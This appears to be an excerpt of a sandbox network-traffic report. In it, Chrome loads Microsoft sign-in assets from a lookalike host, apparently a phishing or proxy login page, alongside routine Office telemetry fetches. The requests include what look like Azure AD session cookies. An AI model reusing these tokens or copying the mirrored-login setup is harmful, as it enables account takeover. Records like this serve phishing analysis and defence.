                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:11 UTC799INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:11 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 673
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                  ETag: 0x8D7B0071D86E386
                                                  x-ms-request-id: 2b2a1d62-a01e-0061-0cef-40dfb8000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171011Z-1544c49f7f8lbbnshC1ZRHdt5c00000002p000000000e3b4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:11 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                  Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  119192.168.2.64983994.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:11 UTC1489OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:12 UTC800INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:11 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 1435
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                  ETag: 0x8D79B8373CB2849
                                                  x-ms-request-id: ebfb0f99-f01e-000d-14ef-400b82000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171011Z-1544c49f7f8rz25nhC1ZRHn4cs00000002r000000000128h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:12 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                  Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  120192.168.2.64983894.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:11 UTC1504OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:12 UTC1406INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:11 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 109863
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT
                                                  ETag: 0x8DAFF34DD9DC630
                                                  x-ms-request-id: 7c66395a-b01e-003b-53ef-40f14d000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171011Z-1544c49f7f8kzjrghC1ZRHgvdc0000000350000000001abn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:12 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91
                                                  Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$|zmk3h-SznuJ2V.tx~%Y
                                                  2024-11-27 17:10:12 UTC1406INData Raw: c4 83 45 a5 d2 a7 c9 61 9f 24 3d 2b 31 6b 72 6b 95 a9 2b 79 ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44
                                                  Data Ascii: Ea$=+1krk+yzxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)|*w{%8-q<hq_m;>9{oY={(ka9)D
                                                  2024-11-27 17:10:12 UTC9510INData Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3
                                                  Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S|we7-<B^3v`vbp[C(&u3NTJ
                                                  2024-11-27 17:10:12 UTC6289INData Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6
                                                  Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2*w'u0dH3kOV1CO"e]:.>vIXU+} ;o*lg-n>u'9K<7EE<}k<M


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.64984113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:12 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:12 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:12 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                  ETag: "0x8DC582BE3E55B6E"
                                                  x-ms-request-id: 75932801-b01e-00ab-324d-40dafd000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171012Z-174f7845968n2hr8hC1EWR9cag0000000wrg00000000wnqg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:12 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.64984013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:12 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:12 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:12 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2284
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                  ETag: "0x8DC582BCD58BEEE"
                                                  x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171012Z-174f7845968cpnpfhC1EWR3afc0000000wrg00000000rzze
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:12 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.64984213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:12 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:13 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:12 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDC681E17"
                                                  x-ms-request-id: 83136512-401e-00ac-3a5a-400a97000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171012Z-174f7845968n2hr8hC1EWR9cag0000000wrg00000000wnqr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:13 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.64984413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:13 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:13 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:13 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF66E42D"
                                                  x-ms-request-id: 3d9c3aa7-901e-00ac-5891-3fb69e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171013Z-174f7845968xr5c2hC1EWRd0hn0000000e0g00000000krn3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
